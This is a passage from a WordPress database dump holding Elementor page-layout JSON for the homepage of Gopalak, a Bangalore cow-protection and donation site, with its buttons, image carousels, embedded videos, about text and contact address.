them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11328,1885,'_elementor_page_assets','a:0:{}'),(11331,1886,'_elementor_edit_mode','builder'),(11332,1886,'_elementor_template_type','wp-page'),(11333,1886,'_elementor_version','3.7.8'),(11334,1886,'_wp_page_template','elementor_canvas'),(11335,1886,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11336,1886,'_elementor_page_assets','a:0:{}'),(11338,1887,'_elementor_edit_mode','builder'),(11339,1887,'_elementor_template_type','wp-page'),(11340,1887,'_elementor_version','3.7.8'),(11341,1887,'_wp_page_template','elementor_canvas'),(11342,1887,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\